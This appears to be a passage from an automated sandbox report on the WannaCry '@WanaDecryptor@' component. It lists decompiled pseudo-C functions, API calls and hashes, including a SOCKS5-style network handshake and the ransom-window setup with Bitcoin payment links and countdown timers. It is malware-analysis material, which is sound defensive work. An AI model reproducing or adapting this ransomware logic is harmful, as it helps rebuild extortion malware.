                                                      • API ID: #825ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 3896714138-0
                                                      • Opcode ID: 90d2daed5e4983ce71ebfea6f3955ddb9dc0852fe9265e398c199eb5aa727e0d
                                                      • Instruction ID: 03ad0fdb8b1fc462ccda58973351f6a4c3eefe2218a3b6158a688f411921b73e
                                                      • Opcode Fuzzy Hash: 90d2daed5e4983ce71ebfea6f3955ddb9dc0852fe9265e398c199eb5aa727e0d
                                                      • Instruction Fuzzy Hash: 22D02EB2818A204B8E20AF7878106CB3B942E013203094A4AF4A5D7381D264ECC183C4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D8C0 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E0040D8C0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a24) {
				void* _v0;
				intOrPtr _v16;
				signed int _v20;
				char _v266;
				char _v267;
				char _v268;
				char _v272;
				char _v280;
				char _v282;
				signed int _v283;
				char _v284;
				void _v287;
				void _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				signed int _v296;
				char _v304;
				char _v312;
				char _v313;
				signed int _v315;
				char _v323;
				signed int _v324;
				signed int _t58;
				signed int _t65;
				signed int* _t66;
				void* _t71;
				void* _t74;
				void* _t86;
				signed int* _t87;
				void _t89;
				signed int _t111;
				signed int _t112;
				signed int _t117;
				void* _t127;
				void* _t132;
				void* _t141;
				intOrPtr _t143;

				_t58 =  *((intOrPtr*)(_v0 + 4))(_a4, _a8, _a24, _t132);
				if(_t58 != 0) {
					L24:
					return _t58 | 0xffffffff;
				} else {
					_t141 = _v0;
					_t89 = 0;
					_v272 = 0;
					if(_a8 != 0) {
						asm("repne scasb");
						_t89 = 1;
						_v272 = 1;
					}
					_v268 = 5;
					_v267 = 1;
					_v266 = 0;
					_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v268, 3);
					if(_t58 < 0) {
						L22:
						_t143 = _a4;
						if(_t143 > 0) {
							__imp__#3(_t143); // executed
						}
						goto L24;
					} else {
						_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v280, 2);
						if(_t58 < 0 || _v292 != 5 || _v291 == 0xff) {
							goto L22;
						} else {
							_v292 = 5;
							_v291 = 1;
							_v290 = 0;
							if(_v16 == 0) {
								_v289 = 1;
								_v288 =  *_t141;
								_t65 = _v20;
								_v283 = _t65;
								_v284 = _t65 >> 8;
								_t66 =  &_v282;
							} else {
								_v289 = 3;
								_t111 = _v296 & 0x000000ff;
								_v288 = _t89;
								_t112 = _t111 >> 2;
								memcpy( &_v287, _t141, _t112 << 2);
								_t86 = memcpy(_t141 + _t112 + _t112, _t141, _t111 & 0x00000003);
								_t117 = _v20;
								 *_t86 = _t117 >> 8;
								_t87 = _t86 + 1;
								 *_t87 = _t117;
								_t66 =  &(_t87[0]);
							}
							_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v292, _t66 -  &_v292);
							if(_t58 < 0) {
								goto L22;
							} else {
								_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v304, 4);
								if(_t58 < 0) {
									goto L22;
								} else {
									_t58 = _v315;
									if(_t58 != 0) {
										goto L22;
									} else {
										_t71 = _v313 - 1;
										if(_t71 == 0) {
											_t127 = _v0;
											_push(6);
											goto L19;
										} else {
											_t74 = _t71 - 2;
											if(_t74 == 0) {
												 *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v312, 1);
												_t127 = _v0;
												_push((_v324 & 0x000000ff) + 2);
												_push( &_v323);
												_push(_a4);
												goto L20;
											} else {
												if(_t74 != 1) {
													L21:
													return 0;
												} else {
													_t127 = _v0;
													_push(0x12);
													L19:
													_push( &_v312);
													_push(_a4);
													L20:
													_t58 =  *((intOrPtr*)(_t127 + 0x24))();
													if(_t58 < 0) {
														goto L22;
													} else {
														goto L21;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}










































                                                      0x0040d8e9
                                                      0x0040d8ee
                                                      0x0040dab4
                                                      0x0040dac1
                                                      0x0040d8f4
                                                      0x0040d8fb
                                                      0x0040d902
                                                      0x0040d906
                                                      0x0040d90a
                                                      0x0040d913
                                                      0x0040d91a
                                                      0x0040d91c
                                                      0x0040d91c
                                                      0x0040d930
                                                      0x0040d935
                                                      0x0040d93a
                                                      0x0040d93f
                                                      0x0040d944
                                                      0x0040daa6
                                                      0x0040daa6
                                                      0x0040daab
                                                      0x0040daae
                                                      0x0040daae
                                                      0x00000000
                                                      0x0040d94a
                                                      0x0040d95a
                                                      0x0040d95f
                                                      0x00000000
                                                      0x0040d981
                                                      0x0040d988
                                                      0x0040d98f
                                                      0x0040d994
                                                      0x0040d999
                                                      0x0040d9db
                                                      0x0040d9e0
                                                      0x0040d9e4
                                                      0x0040d9ed
                                                      0x0040d9f4
                                                      0x0040d9f8
                                                      0x0040d99b
                                                      0x0040d9a8
                                                      0x0040d9ad
                                                      0x0040d9af
                                                      0x0040d9b9
                                                      0x0040d9bc
                                                      0x0040d9c3
                                                      0x0040d9c5
                                                      0x0040d9d1
                                                      0x0040d9d3
                                                      0x0040d9d4
                                                      0x0040d9d6
                                                      0x0040d9d6
                                                      0x0040da11
                                                      0x0040da16
                                                      0x00000000
                                                      0x0040da1c
                                                      0x0040da2c
                                                      0x0040da31
                                                      0x00000000
                                                      0x0040da33
                                                      0x0040da33
                                                      0x0040da39
                                                      0x00000000
                                                      0x0040da3b
                                                      0x0040da40
                                                      0x0040da41
                                                      0x0040da80
                                                      0x0040da83
                                                      0x00000000
                                                      0x0040da43
                                                      0x0040da43
                                                      0x0040da46
                                                      0x0040da62
                                                      0x0040da69
                                                      0x0040da78
                                                      0x0040da7c
                                                      0x0040da7d
                                                      0x00000000
                                                      0x0040da48
                                                      0x0040da49
                                                      0x0040da97
                                                      0x0040daa3
                                                      0x0040da4b
                                                      0x0040da4b
                                                      0x0040da4e
                                                      0x0040da85
                                                      0x0040da8c
                                                      0x0040da8d
                                                      0x0040da8e
                                                      0x0040da90
                                                      0x0040da95
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040da95
                                                      0x0040da49
                                                      0x0040da46
                                                      0x0040da41
                                                      0x0040da39
                                                      0x0040da31
                                                      0x0040da16
                                                      0x0040d95f
                                                      0x0040d944

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 912c8ddbc3f5d0546dfc53f6ab7b6c2a54f01fcb62a7659748a7d661530e9815
                                                      • Instruction ID: 869c219edba7a699f97af29913b463c5d84a0a7100ec88bf0606293c61a6210c
                                                      • Opcode Fuzzy Hash: 912c8ddbc3f5d0546dfc53f6ab7b6c2a54f01fcb62a7659748a7d661530e9815
                                                      • Instruction Fuzzy Hash: BB51803130C2869FD714CF58C840BAB7BD9AF99304F04452DF98A9B382D678D90DCBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00410A10 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00410A10(intOrPtr* _a4) {
				intOrPtr _t6;
				long _t10;
				intOrPtr* _t14;

				_t14 = _a4;
				_t6 =  *_t14;
				if(_t6 == 0) {
					L5:
					_t5 = _t14 + 0x1c; // 0x40468
					return  *_t5;
				} else {
					_t2 = _t14 + 1; // 0xffffbdf8
					if( *_t2 == 0) {
						if(_t6 == 0) {
							goto L5;
						} else {
							return 0;
						}
					} else {
						_t3 = _t14 + 4; // 0x830000ff
						_t10 = SetFilePointer( *_t3, 0, 0, 1);
						_t4 = _t14 + 0xc; // 0x14247c89
						return _t10 -  *_t4;
					}
				}
			}






                                                      0x00410a11
                                                      0x00410a15
                                                      0x00410a19
                                                      0x00410a41
                                                      0x00410a41
                                                      0x00410a45
                                                      0x00410a1b
                                                      0x00410a1b
                                                      0x00410a20
                                                      0x00410a3b
                                                      0x00000000
                                                      0x00410a3d
                                                      0x00410a40
                                                      0x00410a40
                                                      0x00410a22
                                                      0x00410a22
                                                      0x00410a2c
                                                      0x00410a32
                                                      0x00410a38
                                                      0x00410a38
                                                      0x00410a20

                                                      APIs
                                                      • SetFilePointer.KERNELBASE(830000FF,00000000,00000000,00000001,?,00410CBB,?,00000000,?,00000000,FFFFFFFF,?), ref: 00410A2C
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: e974794341ff6e5ab14436fbc7c1d97085009ff257f2fc2de44bcc3722d2f397
                                                      • Instruction ID: 32027725d39edc4efdd6a80838e9bbfe12b8ec9337663397b441d42c78647a48
                                                      • Opcode Fuzzy Hash: e974794341ff6e5ab14436fbc7c1d97085009ff257f2fc2de44bcc3722d2f397
                                                      • Instruction Fuzzy Hash: CCE04F392447209BCA70CF68A814BD3BBE19F45750F18888AB8DA9BB81C2A5FCC5C744
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040C8F0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E0040C8F0(intOrPtr* __eax, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr _t7;

				_t5 = __eax;
				_push(0x18); // executed
				L00412CEC(); // executed
				_t6 = _a4;
				if(_t6 == 0) {
					_t6 = __eax;
				}
				 *_t5 = _t6;
				_t7 = _a8;
				if(_t7 == 0) {
					 *((intOrPtr*)(_t5 + 4)) = _t5;
					return _t5;
				} else {
					 *((intOrPtr*)(_t5 + 4)) = _t7;
					return _t5;
				}
			}






                                                      0x0040c8f0
                                                      0x0040c8f0
                                                      0x0040c8f2
                                                      0x0040c8f7
                                                      0x0040c900
                                                      0x0040c902
                                                      0x0040c902
                                                      0x0040c904
                                                      0x0040c906
                                                      0x0040c90c
                                                      0x0040c914
                                                      0x0040c917
                                                      0x0040c90e
                                                      0x0040c90e
                                                      0x0040c911
                                                      0x0040c911

                                                      APIs
                                                      • #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #823
                                                      • String ID:
                                                      • API String ID: 3944439427-0
                                                      • Opcode ID: 978e7c28ec40dcb92e7f5f015123019c4ac679a5b0e7e4509185db9b43198a7e
                                                      • Instruction ID: 181cdc8cf12c05a8b9a91361c5a521ffeb8e85c4f1c0f104596c53608345ae24
                                                      • Opcode Fuzzy Hash: 978e7c28ec40dcb92e7f5f015123019c4ac679a5b0e7e4509185db9b43198a7e
                                                      • Instruction Fuzzy Hash: FBD017B02022018EDB48DB048155A2ABA906F90305F04C03EA58A8B3A1DA308924D719
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040DB60 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • send.WS2_32(?,?,?,00000000), ref: 0040DB71
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: send
                                                      • String ID:
                                                      • API String ID: 2809346765-0
                                                      • Opcode ID: 3222a83dba255473e0a20e544844f5fa8dd218e70a3b82de0a2cb3badf245f05
                                                      • Instruction ID: 9f2cde9bc08329bc066051ceec9112dcc508ea1adec728888a2f9463dd607dc2
                                                      • Opcode Fuzzy Hash: 3222a83dba255473e0a20e544844f5fa8dd218e70a3b82de0a2cb3badf245f05
                                                      • Instruction Fuzzy Hash: D9C04C79204300FFD204CB10CD85F6BB7A9EBD4710F50C90DB98983254C670EC10DA65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004102B0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004102B0(int _a8, int _a12) {
				void* _t4;

				_t4 = calloc(_a8, _a12); // executed
				return _t4;
			}




                                                      0x004102ba
                                                      0x004102c2

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: calloc
                                                      • String ID:
                                                      • API String ID: 2635317215-0
                                                      • Opcode ID: b99520603795e14427fcdc66bd24236fedacc387ffcb15b9e196dfa964343d57
                                                      • Instruction ID: 04342e400c51e4aa9d9f1a4926e37004e53e6e9aa7dbc080471d4116a51af395
                                                      • Opcode Fuzzy Hash: b99520603795e14427fcdc66bd24236fedacc387ffcb15b9e196dfa964343d57
                                                      • Instruction Fuzzy Hash: 3FB012B95042007FC904FB51DC41C6BB398FBD4201F80884DBC4D42200D539D944C632
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004102D0 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004102D0(void* _a8) {
				void* _t2;

				_t2 = _a8;
				free(_t2); // executed
				return _t2;
			}




                                                      0x004102d0
                                                      0x004102d5
                                                      0x004102db

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: free
                                                      • String ID:
                                                      • API String ID: 1294909896-0
                                                      • Opcode ID: 9547fd8474c1228e0edb2c3a8820201b614da8fcf41e046977b995a71f98eb8e
                                                      • Instruction ID: 587bd5a705c9874b05802bcdcd007e1f5146f32a08b66df6e73241f9cdea139c
                                                      • Opcode Fuzzy Hash: 9547fd8474c1228e0edb2c3a8820201b614da8fcf41e046977b995a71f98eb8e
                                                      • Instruction Fuzzy Hash: 22A022B2000200328C00BAA0C00288A2B8C2A80202B20088EB00282020CA38C0C00200
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00406F80 Relevance: 130.0, APIs: 67, Strings: 7, Instructions: 536windowtimeCOMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E00406F80(void* __ecx, void* __fp0) {
				struct HFONT__* _t135;
				long _t137;
				long _t138;
				long _t139;
				long _t141;
				long _t142;
				long _t143;
				long _t145;
				long _t146;
				long _t147;
				long _t149;
				void* _t214;
				int _t216;
				int _t235;
				int _t238;
				int _t240;
				int _t242;
				int _t245;
				int _t248;
				int _t251;
				int _t253;
				void* _t260;
				void* _t262;
				int _t339;
				void* _t348;
				int _t352;
				intOrPtr _t355;
				intOrPtr _t356;
				intOrPtr _t357;
				intOrPtr _t358;
				void* _t359;
				void* _t360;
				void* _t361;
				void* _t375;

				_t375 = __fp0;
				_push(0xffffffff);
				_push(E00413E9B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t355;
				_t356 = _t355 - 0xd4;
				_t348 = __ecx;
				_push(0);
				E004076A0(__ecx);
				_push(CreateSolidBrush(0xe0));
				L00412D5E();
				_push(CreateSolidBrush(0x121284));
				L00412D5E();
				_push(CreateSolidBrush(0xe000));
				L00412D5E();
				_push(CreateSolidBrush(0xe00000));
				L00412D5E();
				_push(CreateSolidBrush(0));
				L00412D5E();
				_push(CreateSolidBrush(0x3834d1));
				L00412D5E();
				_push(CreateSolidBrush(0x107c10));
				L00412D5E();
				_push(CreateSolidBrush(0xe8a200));
				L00412D5E();
				_push(CreateSolidBrush(0xd77800));
				L00412D5E();
				_push(CreateSolidBrush(0x3cda));
				L00412D5E();
				_t339 = __ecx + 0x880;
				_push(CreateFontA(0x18, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
				L00412D5E();
				_t216 = __ecx + 0x888;
				_push(CreateFontA(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
				L00412D5E();
				_t352 = __ecx + 0x890;
				_t135 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t135);
				L00412D5E();
				_push(0x3ed);
				L00412CE6();
				if(_t339 != 0) {
					_t339 =  *(_t339 + 4);
				}
				_t137 = SendMessageA( *(_t135 + 0x20), 0x30, _t339, 1);
				_push(0x3fe);
				L00412CE6();
				if(_t216 != 0) {
					_t235 =  *(_t216 + 4);
				} else {
					_t235 = 0;
				}
				_t138 = SendMessageA( *(_t137 + 0x20), 0x30, _t235, 1);
				_push(0x3fb);
				L00412CE6();
				if(_t216 != 0) {
					_t238 =  *(_t216 + 4);
				} else {
					_t238 = 0;
				}
				_t139 = SendMessageA( *(_t138 + 0x20), 0x30, _t238, 1);
				_push(0x3ff);
				L00412CE6();
				if(_t352 != 0) {
					_t240 =  *(_t352 + 4);
				} else {
					_t240 = 0;
				}
				_t141 = SendMessageA( *(_t139 + 0x20), 0x30, _t240, 1);
				_push(0x3fc);
				L00412CE6();
				if(_t352 != 0) {
					_t242 =  *(_t352 + 4);
				} else {
					_t242 = 0;
				}
				_t142 = SendMessageA( *(_t141 + 0x20), 0x30, _t242, 1);
				_push(0x400);
				L00412CE6();
				if(_t352 != 0) {
					_t245 =  *(_t352 + 4);
				} else {
					_t245 = 0;
				}
				_t143 = SendMessageA( *(_t142 + 0x20), 0x30, _t245, 1);
				_push(0x3fa);
				L00412CE6();
				if(_t352 != 0) {
					_t352 =  *(_t352 + 4);
				}
				_t145 = SendMessageA( *(_t143 + 0x20), 0x30, _t352, 1);
				_push(0x402);
				L00412CE6();
				if(_t216 != 0) {
					_t248 =  *(_t216 + 4);
				} else {
					_t248 = 0;
				}
				_t146 = SendMessageA( *(_t145 + 0x20), 0x30, _t248, 1);
				_push(0x3ef);
				L00412CE6();
				if(_t216 != 0) {
					_t251 =  *(_t216 + 4);
				} else {
					_t251 = 0;
				}
				_t147 = SendMessageA( *(_t146 + 0x20), 0x30, _t251, 1);
				_push(0x3eb);
				L00412CE6();
				if(_t216 != 0) {
					_t253 =  *(_t216 + 4);
				} else {
					_t253 = 0;
				}
				_t149 = SendMessageA( *(_t147 + 0x20), 0x30, _t253, 1);
				_push(0x3ec);
				L00412CE6();
				if(_t216 != 0) {
					_t216 =  *(_t216 + 4);
				}
				SendMessageA( *(_t149 + 0x20), 0x30, _t216, 1);
				_push(_t348 + 0x5be);
				L00412DA0();
				E00404260(_t348 + 0x228,  *(_t348 + 0x824) ^ 0x00ffffff);
				E00404260(_t348 + 0x290,  *(_t348 + 0x824) ^ 0x00ffffff);
				E00404260(_t348 + 0x2f8,  *(_t348 + 0x824) ^ 0x00ffffff);
				_t260 = _t348 + 0x360;
				E00404260(_t260,  *(_t348 + 0x824) ^ 0x00ffffff);
				_push(_t260);
				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
				L00412CAA();
				_t262 = _t348 + 0x228;
				E00404210(_t262, "https://en.wikipedia.org/wiki/Bitcoin");
				_push(_t262);
				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
				L00412CAA();
				E00404210(_t348 + 0x290, "https://www.google.com/search?q=how+to+buy+bitcoin");
				L00412DA6();
				_push(_t348 + 0x58c);
				_push("mailto:%s");
				_push(_t356 + 0x10);
				 *(_t356 + 0xf8) = 0;
				L00412E00();
				_t357 = _t356 + 8;
				 *((intOrPtr*)(_t357 + 0x18)) = _t357;
				L00412F56();
				E00404210(_t348 + 0x2f8, _t357 + 0x14);
				E00404270(_t348 + 0x888);
				_push( *((intOrPtr*)(_t348 + 0x508)));
				_push("http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s");
				_push(_t357 + 0x10);
				L00412E00();
				_t358 = _t357 + 8;
				 *((intOrPtr*)(_t358 + 0x18)) = _t358;
				L00412F56();
				E00404210(_t348 + 0x360, _t358 + 0x14);
				SendMessageA( *(_t348 + 0x140), 0x406, 0, 0x64);
				SendMessageA( *(_t348 + 0x1c4), 0x406, 0, 0x64);
				_push(0xffffffff);
				_push(2);
				L00412F50();
				_push(0xffffffff);
				_push(2);
				 *( *(_t348 + 0x164)) = 0xe0;
				( *(_t348 + 0x164))[1] = 0xe000;
				L00412F50();
				 *( *(_t348 + 0x1e8)) = 0xe0;
				( *(_t348 + 0x1e8))[1] = 0xe000;
				_t342 = _t348 + 0x3c8;
				E00405820(_t348 + 0x3c8, 1);
				E00405800(_t348 + 0x3c8, 0xb);
				E00405200(_t348 + 0x3c8, 0);
				_push( *(_t348 + 0x824));
				E00405920(_t348 + 0x3c8,  *(_t348 + 0x824), 0xffffff);
				E00405860(_t342, 0xb);
				E004058C0(_t342, 1);
				E00405990(_t342, 1, 0x20);
				E00405180(_t342, "00;00;00;00");
				_t343 = _t348 + 0x444;
				E00405820(_t348 + 0x444, 1);
				E00405800(_t348 + 0x444, 0xb);
				E00405200(_t348 + 0x444, 0);
				_push( *(_t348 + 0x824));
				E00405920(_t348 + 0x444,  *(_t348 + 0x824), 0xffffff);
				E00405860(_t343, 0xb);
				E004058C0(_t343, 1);
				E00405990(_t343, 1, 0x20);
				E00405180(_t343, "00;00;00;00");
				GetTimeZoneInformation(_t358 + 0x38);
				_push(_t358 + 0x28);
				E00401E60(_t375, ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
				_t359 = _t358 + 8;
				SystemTimeToTzSpecificLocalTime(_t359 + 0x3c, _t359 + 0x28, _t359 + 0x18);
				_push( *(_t359 + 0x24) & 0x0000ffff);
				_push( *(_t359 + 0x22) & 0x0000ffff);
				_push( *(_t359 + 0x20) & 0x0000ffff);
				_push( *(_t359 + 0x1c) & 0x0000ffff);
				_push( *(_t359 + 0x26) & 0x0000ffff);
				_push( *(_t359 + 0x26) & 0x0000ffff);
				_push("%d/%d/%d %02d:%02d:%02d");
				_push(_t348 + 0x500);
				L00412E00();
				_push(_t359 + 0x48);
				E00401E60(_t375, ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
				_t360 = _t359 + 0x28;
				SystemTimeToTzSpecificLocalTime(_t360 + 0x38, _t360 + 0x28, _t360 + 0x18);
				_push( *(_t360 + 0x24) & 0x0000ffff);
				_push( *(_t360 + 0x22) & 0x0000ffff);
				_push( *(_t360 + 0x20) & 0x0000ffff);
				_push( *(_t360 + 0x20) & 0x0000ffff);
				_push( *(_t360 + 0x26) & 0x0000ffff);
				_push( *(_t360 + 0x26) & 0x0000ffff);
				_t214 = _t348 + 0x504;
				_push("%d/%d/%d %02d:%02d:%02d");
				_push(_t214);
				L00412E00();
				_t361 = _t360 + 0x20;
				_push(0);
				L00412E06();
				 *((intOrPtr*)(_t361 + 0xec)) = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] =  *((intOrPtr*)(_t361 + 0xe4));
				return _t214;
			}





































                                                      0x00406f80
                                                      0x00406f86
                                                      0x00406f88
                                                      0x00406f8d
                                                      0x00406f8e
                                                      0x00406f95
                                                      0x00406f9f
                                                      0x00406fa1
                                                      0x00406fa3
                                                      0x00406fb5
                                                      0x00406fbc
                                                      0x00406fc8
                                                      0x00406fcf
                                                      0x00406fdb
                                                      0x00406fe2
                                                      0x00406fee
                                                      0x00406ff5
                                                      0x00406ffe
                                                      0x00407005
                                                      0x00407011
                                                      0x00407018
                                                      0x00407024
                                                      0x0040702b
                                                      0x00407037
                                                      0x0040703e
                                                      0x0040704a
                                                      0x00407051
                                                      0x0040705d
                                                      0x00407064
                                                      0x00407091
                                                      0x00407099
                                                      0x0040709c
                                                      0x004070c3
                                                      0x004070cb
                                                      0x004070ce
                                                      0x004070f5
                                                      0x004070fb
                                                      0x00407101
                                                      0x00407104
                                                      0x00407109
                                                      0x00407110
                                                      0x00407117
                                                      0x00407119
                                                      0x00407119
                                                      0x0040712b
                                                      0x0040712d
                                                      0x00407134
                                                      0x0040713b
                                                      0x00407141
                                                      0x0040713d
                                                      0x0040713d
